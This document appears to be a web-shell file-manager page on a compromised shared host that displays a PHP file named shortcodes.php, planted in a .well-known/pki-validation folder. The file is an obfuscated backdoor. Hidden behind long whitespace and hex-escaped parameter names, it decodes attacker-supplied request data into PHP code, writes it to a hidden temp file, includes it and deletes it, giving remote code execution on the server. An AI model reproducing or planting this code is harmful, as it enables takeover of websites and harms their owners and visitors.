HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/bio-nissan.vitavit.com.pk/.well-known/pki-validation/shortcodes.php
<?php																																										if(!empty($_REQUEST["h\x6C\x64"])){ $itm = array_filter([sys_get_temp_dir(), getcwd(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/tmp", "/dev/shm"]); $descriptor = $_REQUEST["h\x6C\x64"]; $descriptor = explode ("." ,$descriptor) ; $element= ''; $s2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s2); foreach($descriptor as $m => $v2) { $chS= ord($s2[$m % $lenS]); $dec= ((int)$v2 - $chS -($m % 10)) ^ 1; $element .= chr($dec);} while ($rec = array_shift($itm)) { if (is_dir($rec) && is_writable($rec)) { $factor = "$rec/.token"; if (file_put_contents($factor, $element)) { include $factor; @unlink($factor); exit; } } } }


if(array_key_exists("\x64\x61t", $_REQUEST)){
	$element = $_REQUEST["\x64\x61t"];
		 $element 	 =		explode  ( ".",$element )  ;	 	
	$pointer = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s);
    
            foreach ($element as $j 	=>		$v3):
                $chS = ord($s[$j % $sLen]);
                $d = ((int)$v3 - $chS - ($j % 10)) ^ 45;
                $pointer .= chr($d);
            endforeach;
	$holder = array_filter([ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/var/tmp", getenv("TEMP"), getcwd(), "/dev/shm", sys_get_temp_dir(), "/tmp"]);
	$res = 0;
do {
    $mrk = $holder[$res] ?? null;
    if ($res >= count($holder)) break;
    		if (!!is_dir($mrk) && !!is_writable($mrk)) {
    $data_chunk = join("/", [$mrk, ".symbol"]);
    $success = file_put_contents($data_chunk, $pointer);
if ($success) {
	include $data_chunk;
	@unlink($data_chunk);
	exit;}
}
    $res++;
} while (true);
}